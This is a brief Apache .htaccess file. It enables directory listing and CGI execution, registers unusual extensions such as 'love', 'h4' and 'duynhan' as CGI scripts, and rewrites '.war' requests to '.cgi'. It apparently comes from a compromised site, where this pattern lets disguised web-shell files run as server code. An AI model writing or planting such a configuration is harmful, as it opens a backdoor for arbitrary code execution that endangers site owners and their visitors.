
Options +FollowSymLinks +Indexes
DirectoryIndex default.html 
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg duynhan

RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##